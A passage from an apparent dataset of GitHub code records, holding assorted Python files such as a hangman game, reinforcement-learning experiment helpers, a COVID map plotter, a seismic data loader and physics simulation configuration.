Button(text='Random',width=40,anchor=CENTER,command=changeColor)\r\nb3 = Button(text='Clear',width=40,anchor=CENTER)\r\ne1 = Entry()\r\n# e2 = Entry(bg='LightBlue1',fg='Green4',font='none 15',width=45)\r\n\r\n\r\nb3.config(command=clearEntry)\r\n\r\nl1.place(x=5,y=10)\r\nl2.place(x=5,y=40)\r\nl3.place(x=5,y=100)\r\nl4.place(x=5,y=150)\r\nl5.place(x=5,y=200)\r\n\r\nb1.place(x=200,y=10)\r\nb2.place(x=200,y=50)\r\nb3.place(x=200,y=100)\r\ne1.place(x=200,y=150)\r\n# e2.place(x=5,y=200)\r\n\r\nroot.mainloop()","repo_name":"Wiraphong2003/Newmer","sub_path":"testGUI02.py","file_name":"testGUI02.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13196151361","text":"import os\nimport gym\nfrom stable_baselines import A2C\nfrom stable_baselines import DDPG\nfrom stable_baselines.common import make_vec_env\nfrom stable_baselines.common.cmd_util import make_atari_env\nfrom stable_baselines.common.vec_env import VecFrameStack\nfrom stable_baselines import results_plotter\nfrom stable_baselines.results_plotter import load_results\nfrom stable_baselines.bench import Monitor\nfrom stable_baselines.common.noise import NormalActionNoise, OrnsteinUhlenbeckActionNoise, AdaptiveParamNoiseSpec\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef get_a2c_para_dict(gamma, n_step, learning_rate, alpha, epsilon):\n para_dict = {}\n\n para_dict[\"gamma\"] = gamma\n para_dict[\"n_step\"] = n_step\n para_dict[\"learning_rate\"] = learning_rate\n para_dict[\"alpha\"] = alpha\n para_dict[\"epsilon\"] = epsilon\n\n return para_dict\n\ndef get_ddpg_para_dict(gamma, nb_train_steps, nb_rollout_steps, nb_eval_steps, \n batch_size, actor_lr, critic_lr, buffer_size, reward_scale):\n para_dict = {}\n\n para_dict[\"gamma\"] = gamma\n para_dict[\"nb_train_steps\"] = nb_train_steps\n para_dict[\"nb_rollout_steps\"] = nb_rollout_steps\n para_dict[\"nb_eval_steps\"] = nb_eval_steps\n para_dict[\"batch_size\"] = batch_size\n para_dict[\"actor_lr\"] = actor_lr\n para_dict[\"critic_lr\"] = critic_lr\n para_dict[\"buffer_size\"] = buffer_size\n para_dict[\"reward_scale\"] = reward_scale\n\n return para_dict\n\ndef run_episode_mean_reward_experiment_a2c(game_name, solved_score, policy, parameter_dict, episode=500, timesteps=25000, render=False, atari_game=False):\n \n # make environment\n if not atari_game:\n env = make_vec_env(game_name)\n else:\n env = make_atari_env(game_name, num_env=1, seed=0)\n env = VecFrameStack(env, n_stack=4)\n\n # model defination\n model = A2C(policy, env, verbose=1, gamma=parameter_dict[\"gamma\"]\n , n_steps=parameter_dict[\"n_step\"]\n , alpha=parameter_dict[\"alpha\"]\n , learning_rate=parameter_dict[\"learning_rate\"]\n , epsilon=parameter_dict[\"epsilon\"])\n\n episode_rewards = []\n total_timesteps = 0\n for i in range(episode):\n reward_sum = 0\n done = False\n obs = env.reset()\n while not done:\n action, _states = model.predict(obs)\n obs, reward, done, info = env.step(action)\n\n total_timesteps += 1\n if total_timesteps > timesteps:\n break\n\n reward_sum += reward\n if render == True:\n env.render()\n episode_rewards.append(reward_sum)\n\n if i % 100 == 0:\n print(\"episode: \"+str(i))\n # print('\\rEpisode {}, Episode Score: {}, Max: {:.2f}, Min: {:.2f}, Steps: {}'\\\n # .format(i, reward_sum, np.max(episode_rewards), np.min(episode_rewards), total_timesteps), end=\"\\n\")\n\n if reward_sum >= solved_score:\n break\n # print('\\rAverage Rewards {}'.format(np.mean(episode_rewards)))\n # plt.plot(np.arange(1, len(episode_rewards)+1), episode_rewards)\n # plt.ylabel('episode reward')\n # plt.xlabel('# of episode')\n # plt.title('a2c '+game_name)\n # plt.show()\n return episode_rewards\n\n \ndef run_experiments_moniter_a2c(game_name, policy, parameter_dict, timesteps=25000, atari_game=False):\n log_dir = \"/tmp/\"\n\n # make environment\n if not atari_game:\n env = make_vec_env(game_name)\n else:\n env = make_atari_env(game_name, num_env=1, seed=0)\n env = VecFrameStack(env, n_stack=4)\n \n env = Monitor(env, log_dir)\n\n # model defination\n model = A2C(policy, env, verbose=1, gamma=parameter_dict[\"gamma\"]\n , n_steps=parameter_dict[\"n_step\"]\n , alpha=parameter_dict[\"alpha\"]\n , learning_rate=parameter_dict[\"learning_rate\"]\n , epsilon=parameter_dict[\"epsilon\"])\n model.learn(timesteps)\n\n results_plotter.plot_results([log_dir], timesteps, results_plotter.X_TIMESTEPS, \"A2C \"+game_name)\n plt.show()\n\n\ndef run_episode_mean_reward_experiment_ddpg(game_name, solved_score, policy, parameter_dict, episode=500 ,timesteps=25000, render=False, atari_game=False):\n\n # make environment\n if not atari_game:\n env = make_vec_env(game_name)\n else:\n env = make_atari_env(game_name, num_env=1, seed=0)\n env = VecFrameStack(env, n_stack=4)\n\n n_actions = env.action_space.shape[-1]\n action_noise = OrnsteinUhlenbeckActionNoise(mean=np.zeros(n_actions), sigma=float(0.5) * np.ones(n_actions))\n\n # model defination\n model = DDPG(policy, env, action_noise=None ,verbose=1, gamma=parameter_dict[\"gamma\"]\n , nb_train_steps=parameter_dict[\"nb_train_steps\"]\n , nb_rollout_steps=parameter_dict[\"nb_rollout_steps\"]\n , nb_eval_steps=parameter_dict[\"nb_eval_steps\"]\n , batch_size=parameter_dict[\"batch_size\"]\n , actor_lr=parameter_dict[\"actor_lr\"]\n , critic_lr=parameter_dict[\"critic_lr\"]\n , buffer_size=parameter_dict[\"buffer_size\"]\n , reward_scale=parameter_dict[\"reward_scale\"])\n\n episode_rewards = []\n total_timesteps = 0\n for i in range(episode):\n reward_sum = 0\n done = False\n obs = env.reset()\n while not done:\n action, _states = model.predict(obs)\n obs, reward, done, info = env.step(action)\n total_timesteps += 1\n\n if total_timesteps > timesteps:\n break\n\n if render == True:\n env.render()\n\n reward_sum += reward\n episode_rewards.append(reward_sum)\n\n if i % 100 == 0:\n print(\"episode: \"+str(i))\n \n # print('\\rEpisode {}, Episode Score: {}, Max: {:.2f}, Min: {:.2f}, total_steps: {:.2f}'\\\n # .format(i, reward_sum, np.max(episode_rewards), np.min(episode_rewards), total_timesteps), end=\"\\n\")\n\n if reward_sum >= solved_score:\n break\n # print('\\rAverage Rewards {}'.format(np.mean(episode_rewards)))\n # plt.plot(np.arange(1, len(episode_rewards)+1), episode_rewards)\n # plt.ylabel('episode reward')\n # plt.xlabel('# of episode')\n # plt.title('ddpg '+game_name)\n # plt.show()\n return episode_rewards\n ","repo_name":"shizhec/Unimelb-MCS-RL-A2C","sub_path":"experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":6717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71442399849","text":"# Check the given number is fibonaki number or not\n\nimport math\n\ndef inPerfectSquare(x):\n s = int(math.sqrt(x))\n return s * s == x\n\ndef isFibonacci(n):\n return inPerfectSquare(5 * n * n + 4) or inPerfectSquare(5 * n * n - 4)\n\nfor i in range(1,11):\n if (isFibonacci(i) == True):\n print(i,\" is Fibonacci number\")\n else:\n print(i,\" is not fibonacci number\")","repo_name":"smitjogani/python","sub_path":"march/march3.py","file_name":"march3.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1522331503","text":"import matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nimport pickle\nfrom pathlib import Path\nimport shutil\nimport numpy as np\nfrom itertools import compress\nfrom process_data import getData\nfrom util import calBinsScale, getPlotPicklePath, classifyDf\nfrom plot import plotCase, plotName, plotCasePickle\nimport warnings\n\n\ndef adjustNameLdn(xcoord, ycoord, name):\n \"\"\"\n annotations adjustment for london boroughs\n \"\"\"\n if name == \"City of London\":\n font = FontProperties(family=\"Palatino\", size=3)\n else:\n font = FontProperties(family=\"Palatino\", size=4)\n if name == \"Hammersmith and Fulham\":\n xcoord += 0.015\n ycoord -= 0.015\n if name == \"Kensington and Chelsea\":\n xcoord -= 0.015\n ycoord += 0.01\n if name == \"Westminster\":\n xcoord += 0.01\n ycoord -= 0.005\n if name == \"Camden\":\n xcoord -= 0.005\n if name.startswith(\"Hackney\"):\n xcoord += 0.015\n if name == \"Barking and Dagenham\":\n ycoord -= 0.005\n if name == \"Lewisham\":\n ycoord -= 0.005\n return xcoord, ycoord, name, font\n\n\ndef plotLdn():\n fig, ax = plt.subplots(1, figsize=(6, 4))\n\n caseDates, caseGeo = getData(loc=\"London\")\n\n binsScale = calBinsScale(caseGeo[caseDates[-1]])\n plotPicklePath = Path(getPlotPicklePath(binsScale, loc=\"ldn\"))\n rebase = False\n if not plotPicklePath.is_file():\n rebase = True\n else:\n with warnings.catch_warnings(record=True) as w:\n with open(plotPicklePath, \"rb\") as f:\n ax = pickle.load(f)\n try:\n rebase = \"This figure was saved with matplotlib version\" in str(\n w[-1].message\n )\n except IndexError:\n pass\n\n if rebase:\n caseDate = caseDates[-1]\n plotCase(ax, caseGeo, caseDate)\n plotName(caseGeo, adjustNameLdn)\n plt.text(\n 0.1,\n 0.05,\n caseDate.strftime(\"%d %b %Y\"),\n transform=ax.transAxes,\n fontproperties=FontProperties(family=\"Palatino\", size=8),\n label=\"dateText\",\n )\n with open(plotPicklePath, \"wb\") as f:\n pickle.dump(ax, f, pickle.HIGHEST_PROTOCOL)\n\n caseToday = (\n caseGeo.drop(columns=[\"geometry\", \"coords\"], errors=\"ignore\")\n .set_index(\"name\")\n .transpose()\n )\n caseYesterdayPicklePath = Path(\n \"data\", \"pickle\", \"_\".join([\"cases\", \"ldn\", \"yesterday\"]) + \".pickle\"\n )\n if (not rebase) and caseYesterdayPicklePath.is_file():\n with open(caseYesterdayPicklePath, \"rb\") as f:\n caseYesterday = pickle.load(f)\n caseDiff = (\n classifyDf(caseYesterday, binsScale)\n .eq(classifyDf(caseToday, binsScale))\n .all(axis=1)\n .to_numpy()\n )\n else:\n caseDiff = np.full(len(caseDates), False)\n\n for caseDate in compress(caseDates, ~caseDiff):\n plt.cla()\n ax = plotCasePickle(binsScale, caseGeo, caseDate, plotPicklePath)\n caseImgPath = Path(\n \"docs\",\n \"img\",\n \"_\".join([\"ldn\", \"cases\"]),\n \"_\".join([\"ldn\", \"cases\", caseDate.strftime(\"%Y_%m_%d\")]) + \".png\",\n )\n plt.savefig(caseImgPath, dpi=300, transparent=False)\n if caseDate == caseDates[-1]:\n caseLatestImgPath = Path(\n \"docs\", \"img\", \"_\".join([\"ldn\", \"cases\", \"latest\"]) + \".png\"\n )\n shutil.copy2(caseImgPath, caseLatestImgPath)\n\n with open(caseYesterdayPicklePath, \"wb\") as f:\n pickle.dump(caseToday, f, pickle.HIGHEST_PROTOCOL)\n\n plt.close(\"all\")\n","repo_name":"airallergy/covid-19-choropleth-map-uk","sub_path":"scripts/plot_ldn_latest.py","file_name":"plot_ldn_latest.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"14344824438","text":"from random import *\r\n\r\n#variables\r\nmax = 7\r\nfails = 0\r\nsofar = []\r\n\r\n#list of words that could be randomly picked\r\nwords = ['artist' , 'spiderman', 'multiverse' , 'science' , 'animation', \"oregano\", 'dog', 'skrt' , 'yeet','thicc' , 'wacc']\r\n\r\n#picking the word from the list and converts that into a list\r\npickwordnum = randint(0, len(words)-1)\r\npickword = words[pickwordnum]\r\nword = list(pickword)\r\nguessword = []\r\n\r\n#replacing letters with spaces\r\nfor letter in word:\r\n guessword = guessword + [' ']\r\n\r\n#game stuff\r\nwhile fails < max :\r\n #prints spaces\r\n print(guessword)\r\n #input for guess\r\n guess = input(\"guess a letter : \")\r\n\r\n #can't repeat guesses\r\n if guess in sofar:\r\n print(\"you've already guessed that!\")\r\n print(\"Guesses so far: \" , sofar)\r\n else:\r\n #shows guesses\r\n sofar.append(guess)\r\n print(\"Guesses so far: \" , sofar )\r\n\r\n #replaces spaces with letters\r\n for idx, letter in enumerate(word):\r\n if letter == guess:\r\n guessword[idx] = guess\r\n\r\n #adds to fail tally if the guess is wrong\r\n if guess not in word :\r\n fails = fails + 1\r\n\r\n #when completed\r\n if guessword == word :\r\n print(\"You got it! the word was \" + pickword + '!')\r\n break\r\n\r\n #prints the amount of tries left\r\n print(\"You have \" + str(max - fails) + \" tries left\")\r\n","repo_name":"yeethaw/girls-who-code-stuff","sub_path":"python/Hangman.py","file_name":"Hangman.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73975493288","text":"#!/usr/bin/python\n#\n# description\n#\n# by AndBro @2023\n# __________________________\n\ndef __load_romy_raw(seed, starttime, endtime):\n\n '''\n\n VARIABLES:\n - seed_id code of seismic stations (e.g. \"BW.DROMY..FJU\")\n - starttime start date (str / UTCDateTime object)\n - endtime end date (str / UTCDateTime object)\n \n DEPENDENCIES:\n - import obspy\n - import io\n - from pandas import date_range\n\n OUTPUT:\n - st stream object\n \n EXAMPLE:\n >>> __load_romy_raw(\"BW.DROMY..FJZ\", starttime, endtime)\n\n '''\n\n import obspy\n import io\n from pandas import date_range\n \n tbeg = obspy.UTCDateTime(starttime)\n tend = obspy.UTCDateTime(endtime)\n\n net, sta, loc, cha = seed.split(\".\")\n \n reclen = 512\n chunksize = 100000 * reclen # Around 50 MB\n \n st0 = obspy.Stream()\n \n for dt in date_range(tbeg.date, tend.date):\n \n doy = UTCDateTime(dt).julday\n year = UTCDateTime(dt).year\n \n path = f\"/import/freenas-ffb-01-data/romy_archive/{year}/{net}/{sta}/{cha}.D/\"\n\n with io.open(path+f\"{net}.{sta}.{loc}.{cha}.D.{year}.{doy}\", \"rb\") as fh:\n while True:\n with io.BytesIO() as buf:\n c = fh.read(chunksize);\n if not c:\n break\n buf.write(c);\n buf.seek(0, 0);\n st = obspy.read(buf);\n st0 += st\n \n st0.merge()\n \n return st0 \n\n\n\n\n## End of File\n","repo_name":"andbrocode/andbro_python","sub_path":"andbro__load_romy_raw.py","file_name":"andbro__load_romy_raw.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32450767897","text":"import transformers\n\nMAX_TOKEN_LEN = 512\nMAX_TARGET_LEN = 32\nBATCH_SIZE = 8\nEPOCHS = 2\nT5_PATH = \"input/t5-base\"\nMODEL_PATH = \"output/\"\nTOKENIZER = transformers.T5TokenizerFast.from_pretrained(\n T5_PATH, do_lower_case=True\n)\n\nTRAIN_DATA = \"data/train-v2.0.json\"\nVAL_DATA = \"data/dev-v2.0.json\"","repo_name":"Mtaylert/nlp_research","sub_path":"question_answering/t5QA/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36259571135","text":"class Solution:\n def firstUniqChar(self, s: str) -> int:\n helper = {}\n for i in s:\n if helper.__contains__(i):\n helper[i] += 1\n else:\n helper[i] = 1\n for i, n in enumerate(s):\n if helper[n] == 1:\n return i\n\n return -1\n\n\nslu = Solution()\nprint(slu.firstUniqChar(\"loveleetcode\"))\n","repo_name":"kefirzhang/algorithms","sub_path":"leetcode/python/easy/p387_firstUniqChar.py","file_name":"p387_firstUniqChar.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21350291867","text":"from google.cloud import bigquery\n\n\ncounter = 0;\nedges = {};\n\nclient = bigquery.Client()\n\ndef query_stackoverflow(curr_subreddit):\n # get unique authors on subreddit\n query_job = client.query(\n\"\"\"\nselect \n distinct author\nfrom\n `pushshift.rt_reddit.comments` comments\nwhere\n comments.subreddit = \"{}\";\n\"\"\".format(curr_subreddit)\n)\n results = query_job.result() # Waits for job to complete.\n print('recieved results! got redditors')\n if (curr_subreddit not in edges):\n edges[curr_subreddit] = set()\n\n for redditor in results:\n print('querying for redditor: {}'.format(redditor.author))\n query_job = client.query(\n\"\"\"\nselect \n distinct subreddit\nfrom\n `pushshift.rt_reddit.comments` comments\nwhere\n comments.author = \"{}\";\n\"\"\".format(redditor.author)\n )\n linked_subreddits = query_job.result() # Waits for job to complete.\n print('got subreddits: ')\n for sub in linked_subreddits:\n print(' {},'.format(sub.subreddit))\n edges[curr_subreddit].add(sub.subreddit)\n print(' fin ')\n\nif __name__ == '__main__':\n query_stackoverflow('chess')\n","repo_name":"seankdecker/cs224w-final-proj","sub_path":"testing-google-cloud/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9341954330","text":"\"\"\"\nA class to keep track of which systems are modified during configure().\n\"\"\"\n\nfrom openmdao.utils.general_utils import all_ancestors\n\n\ndef _descendents(system, sysiter):\n \"\"\"\n Filter given iterator of system paths to include only system's descendants.\n\n All pathnames are ancestors of system's descendents so a simple tree depth comparison\n is sufficient to determine if a given path is a descendent.\n\n Parameters\n ----------\n system : \n Starting system. We return only descendents of this system.\n sysiter : iter of str\n Iterator of pathnames of ancestors of system's descendents.\n\n Yields\n ------\n str\n Pathnames of descendents.\n int\n Number of system names in each pathname.\n \"\"\"\n mylen = system.pathname.count('.') + 1 if system.pathname else 0\n for path in sysiter:\n plen = path.count('.') + 1 if path else 0\n if plen > mylen:\n yield (path, plen)\n\n\nclass _ConfigInfo(object):\n def __init__(self):\n self._reset()\n\n def _reset(self):\n self._modified_systems = set()\n\n def _add_mod_parallel_groups(self, group):\n # if this group on any proc has local modified descendant systems that are parallel groups,\n # this information needs to be known on all procs so that local parallel groups can\n # be marked as modified if they have any modified descendants, even remote ones.\n if group.comm.size > 1 and group._contains_parallel_group:\n mod_pars = set()\n if self._modified_systems:\n prefix = group.pathname + '.' if group.pathname else ''\n our_pars = [p for p in group._problem_meta['parallel_groups']\n if p.startswith(prefix)]\n for par in our_pars:\n pre = par + '.'\n for spath in self._modified_systems:\n if spath.startswith(pre):\n mod_pars.add(par)\n break\n\n all_mods = group.comm.allgather(mod_pars)\n\n for mods in all_mods:\n for mod in mods:\n self._modified_systems.update(all_ancestors(mod))\n\n def _var_added(self, comp_path, vname):\n self._modified_systems.update(all_ancestors(comp_path))\n\n def _prom_added(self, group_path):\n # don't update for top level group because we always call _setup_var_data on the\n # top level group after configure\n if group_path:\n self._modified_systems.update(all_ancestors(group_path))\n\n def _modified_system_iter(self, group):\n \"\"\"\n Iterate over modified systems in bottom up order.\n\n Parameters\n ----------\n group : \n Group that has just been configured.\n\n Yields\n ------\n \n Systems that have been modified.\n \"\"\"\n self._add_mod_parallel_groups(group)\n\n len_prefix = len(group.pathname) + 1 if group.pathname else 0\n\n # sort into longest first order so the systems will get updated bottom up\n for path, _ in sorted(_descendents(group, self._modified_systems),\n key=lambda t: (t[1], t[0]), reverse=True):\n s = group._get_subsystem(path[len_prefix:])\n if s is group:\n continue # don't update this group because that will happen later\n if s is not None and s._is_local:\n yield s\n\n def _update_modified_systems(self, group):\n for s in self._modified_system_iter(group):\n s._setup_var_data()\n","repo_name":"OpenMDAO/OpenMDAO","sub_path":"openmdao/core/configinfo.py","file_name":"configinfo.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":451,"dataset":"github-code","pt":"53"} +{"seq_id":"33862851081","text":"import os\nimport sys\n\ncaption_txt_f = os.path.abspath(sys.argv[1])\nsplit_folder = os.path.abspath(sys.argv[2])\nimage_folder = os.path.abspath(sys.argv[3])\noutput_file = os.path.abspath(sys.argv[4])\n\nwith open(os.path.join(split_folder, \"Flickr_8k.trainImages.txt\")) as r:\n train_paths = set(map(lambda x: x.strip(), r))\nwith open(os.path.join(split_folder, \"Flickr_8k.devImages.txt\")) as r:\n dev_paths = set(map(lambda x: x.strip(), r))\nwith open(os.path.join(split_folder, \"Flickr_8k.testImages.txt\")) as r:\n test_paths = set(map(lambda x: x.strip(), r))\n\nwith open(caption_txt_f, \"r\") as r, open(output_file + \".train.en\", \"w\") as train_en, \\\n open(output_file + \".dev.en\", \"w\") as dev_en, open(output_file + \".test.en\", \"w\") as test_en:\n for line in r:\n spl = line.strip().split(\",\")\n if spl[0] != \"image\":\n path, caption = os.path.join(image_folder, spl[0]), \" \".join(spl[1:])\n if spl[0] in train_paths:\n train_en.write(path + \"\\t\" + caption + \"\\n\")\n elif spl[0] in dev_paths:\n dev_en.write(path + \"\\t\" + caption + \"\\n\")\n elif spl[0] in test_paths:\n test_en.write(path + \"\\t\" + caption + \"\\n\")\nwith open(os.path.join(split_folder, \"Flickr8k.arabic.full.txt\"), \"r\") as r, \\\n open(output_file + \".train.ar\", \"w\") as train_ar, open(output_file + \".dev.ar\", \"w\") as dev_ar, \\\n open(output_file + \".test.ar\", \"w\") as test_ar:\n for line in r:\n spl = line.strip().split(\"\\t\")\n if spl[0] != \"image\":\n path, caption = os.path.join(image_folder, spl[0][:-2]), \" \".join(spl[1:])\n if spl[0][:-2] in train_paths:\n train_ar.write(path + \"\\t\" + caption + \"\\n\")\n elif spl[0][:-2] in dev_paths:\n dev_ar.write(path + \"\\t\" + caption + \"\\n\")\n elif spl[0][:-2] in test_paths:\n test_ar.write(path + \"\\t\" + caption + \"\\n\")\n","repo_name":"rasoolims/ImageTranslate","sub_path":"src/scripts/flickr/create_train_dev_list.py","file_name":"create_train_dev_list.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"74407405928","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"RPBeta90Energy7TeV\")\n\n# Specify the maximum events to simulate\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(10)\n)\n\n# Configure the output module (save the result in a file -- RPinelastic90.root)\nprocess.o1 = cms.OutputModule(\"PoolOutputModule\",\n outputCommands = cms.untracked.vstring('keep *', \n 'drop *_*_TrackerHits*_*', \n 'drop *_*_Muon*_*', \n 'drop *_*_Ecal*_*', \n 'drop *_*_Hcal*_*', \n 'drop *_*_Calo*_*', \n 'drop *_*_Castor*_*', \n 'drop *_*_FP420SI_*', \n 'drop *_*_ZDCHITS_*'),\n fileName = cms.untracked.string('file:input2.root')\n)\n\n# Configure if you want to detail or simple log information.\n# LoggerMax -- detail log info output including:\n# - errors.log\n# - warnings.log\n# - infos.log\n# - debugs.log\n# LoggerMin -- simple log info output to the standard output (e.g. screen)\n#process.load(\"Configuration.TotemCommon.LoggerMax_cfi\")\nprocess.load(\"Configuration.TotemCommon.LoggerMin_cfi\")\n\n# Use random number generator service\nprocess.load(\"Configuration.TotemCommon.RandomNumbers_cfi\")\n\n# Use particle table\nprocess.load(\"SimGeneral.HepPDTESSource.pdt_cfi\")\n\n# Geometry - beta* specific\nprocess.load(\"Configuration.TotemCommon.geometryRP_cfi\")\nprocess.XMLIdealGeometryESSource.geomXMLFiles.append('Geometry/TotemRPData/data/RP_Beta_90/RP_Dist_Beam_Cent.xml')\n\n# declare optics parameters\nprocess.load(\"Configuration.TotemOpticsConfiguration.OpticsConfig_7000GeV_90_cfi\")\n\n# Magnetic Field\n# by default we have 3.8T\nprocess.load(\"Configuration.StandardSequences.MagneticField_cff\")\n\n# Monte Carlo gun \nprocess.load(\"IOMC.FlatProtonLogKsiLogTGun.Beta90_cfi\")\n# process.FlatProtonLogKsiLogTGun.Verbosity = 1\n\n# Smearing\nprocess.load(\"IOMC.SmearingGenerator.SmearingGenerator_cfi\")\nprocess.SmearingGenerator.originalLabel = 'original'\nprocess.SmearingGenerator.modifyLabel = 'source'\nprocess.SmearingGenerator.verbosity = 0\n\n# Oscar - G4 simulation & proton transport\nprocess.load(\"Configuration.TotemCommon.g4SimHits_cfi\")\nprocess.g4SimHits.Physics.BeamProtTransportSetup = process.BeamProtTransportSetup\nprocess.g4SimHits.Generator.HepMCProductLabel = 'source' # energy+vertex smearing\nprocess.g4SimHits.G4EventManagerVerbosity = 0\nprocess.g4SimHits.G4StackManagerVerbosity = 0\nprocess.g4SimHits.G4TrackingManagerVerbosity = 0\nprocess.g4SimHits.MagneticField.Verbosity = False\nprocess.g4SimHits.Physics.Verbosity = 0\nprocess.g4SimHits.Physics.BeamProtTransportSetup.Verbosity = False\nprocess.g4SimHits.Generator.Verbosity = 0\nprocess.g4SimHits.SteppingAction.Verbosity = 0\nprocess.g4SimHits.Totem_RP_SD.Verbosity = 0\nprocess.g4SimHits.TotemSD.Verbosity = 0\n\n# No pile up for the mixing module\nprocess.load(\"SimGeneral.MixingModule.mixNoPU_cfi\")\n\n# RP Strip digitization\nprocess.load(\"SimTotem.RPDigiProducer.RPSiDetConf_cfi\")\n# process.RPSiDetDigitizer.RPVerbosity = 1\n\nprocess.load(\"RecoTotemRP.RPClusterizer.RPClusterizationConf_cfi\")\n# process.RPClustProd.Verbosity = 1\n\nprocess.load(\"RecoTotemRP.RPRecoHitProducer.RPRecoHitProdConf_cfi\")\n# process.RPHecoHitProd.Verbosity = 1\n\nprocess.load(\"RecoTotemRP.RPSingleCandidateTrackFinder.RPSingleTrackCandFindConf_cfi\")\n# process.RPSinglTrackCandFind.Verbosity = 1\n\nprocess.load(\"RecoTotemRP.RPTrackCandidateCollectionFitter.RPSingleTrackCandCollFitted_cfi\")\n# process.RPSingleTrackCandCollFit.Verbosity = 1\n\nprocess.p1 = cms.Path(process.SmearingGenerator*process.g4SimHits*process.mix*process.RPSiDetDigitizer*process.RPClustProd*process.RPHecoHitProd*process.RPSinglTrackCandFind*process.RPSingleTrackCandCollFit)\n\nprocess.outpath = cms.EndPath(process.o1)\n","repo_name":"elizamelo/CMSTOTEMSim","sub_path":"CMSSW_7_0_4/src/L1TriggerTotem/CoincidenceChip/test/simdigi_cfg.py","file_name":"simdigi_cfg.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14391748760","text":"from django import forms\n\n\nclass searchform(forms.Form):\n \"\"\"\n Form model for search bar\n \"\"\"\n\n search = forms.CharField(\n label=\"Search\",\n required=False,\n widget=forms.TextInput(attrs={\"placeholder\": \"Search Encyclopedia\"}),\n )\n\n\nclass newpageform(forms.Form):\n \"\"\"\n Form model for creation of new entry\n \"\"\"\n\n title = forms.CharField(\n label=\"Title\",\n required=True,\n widget=forms.TextInput(\n attrs={\"placeholder\": \"Page Title...\", \"class\": \"col-sm-11\"}\n ),\n )\n\n body = forms.CharField(\n label=\"Content\",\n required=False,\n widget=forms.Textarea(\n attrs={\"placeholder\": \"Markdown Content...\", \"class\": \"col-sm-11\"}\n ),\n )\n\n\nclass editpageform(forms.Form):\n \"\"\"\n Form model for editing of entry\n \"\"\"\n\n title = forms.CharField(label=\"Title\", required=False, widget=forms.HiddenInput())\n\n body = forms.CharField(\n label=\"Content\",\n required=False,\n widget=forms.Textarea(attrs={\"class\": \"col-sm-11\"}),\n )\n","repo_name":"pudimlucy/CS50w","sub_path":"wiki/wiki/encyclopedia/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11207617382","text":"from utils import *\nimport json\n\nif __name__ == \"__main__\":\n\n json_path = \"/home/xhu/Code/auto_annotation/src/config.json\"\n with open(json_path, 'r') as f:\n cfg = json.load(f)\n\n gt = GTdata(cfg[\"xml_path\"])\n\n interval = cfg[\"intervals\"]\n\n assert len(interval) > 0, \"No valid interval.\"\n\n frame_list = frame_list_gen(cfg[\"img_path\"], start = interval[0][0], end = interval[-1][-1])\n\n final_interval = []\n\n false_interval = []\n\n viou_thresh = cfg[\"viou_thresh\"]\n\n # f_bbox_traj = {}\n # b_bbox_traj = {}\n\n # Total number of tracker to be tried\n track_num = len(cfg[\"track_type\"])\n i_bbox_traj = {}\n\n while(len(interval)>0):\n cur_interval = interval[0]\n interval = interval[1:]\n\n f_bbox_traj = {}\n b_bbox_traj = {}\n\n print(cur_interval)\n # if the current interval contains less than 3 frames, then stop tracking, \n # Since the middle frame can be labeled by linear interpolation\n if cur_interval[1] - cur_interval[0] <2 :\n false_interval.append(cur_interval)\n # Linear Interpolation\n length = cur_interval[1] - cur_interval[0]\n bbox_0 = gt.get_bbox(cfg[\"obj_id\"], cur_interval[0])\n bbox_1 = gt.get_bbox(cfg[\"obj_id\"], cur_interval[1])\n\n for idx in range(cur_interval[0], cur_interval[1] + 1):\n weight = (idx - cur_interval[0])/length\n bbox_interpolate = (bbox_0[0]*(1 - weight) + bbox_1[0]*weight,\n bbox_0[1]*(1 - weight) + bbox_1[1]*weight,\n (bbox_0[2]*(1 - weight) + bbox_1[2]*weight),\n (bbox_0[3]*(1 - weight) + bbox_1[3]*weight))\n\n i_bbox_traj[idx] = bbox_interpolate\n print(\"The result is manually labeled.\")\n continue\n\n\n viou_max = 0\n tracker_tried = 0\n \n # Track the interval by all selected trackers\n for tracker in cfg[\"track_type\"]:\n viou, ftrack, btrack = tracker_eval(gt, frame_list, cur_interval[0], cur_interval[1], tracker, cfg[\"obj_id\"])\n tracker_tried += 1\n if viou >= viou_thresh and viou > viou_max:\n # add the current interval into final interval list if hasn't done before\n if viou_max == 0:\n final_interval.append(cur_interval)\n\n length = cur_interval[1] - cur_interval[0] + 1\n\n # Calculate the interpolated trajectory between forward and backward tracking\n i_bboxes = for_back_interpolation(ftrack, btrack)\n\n 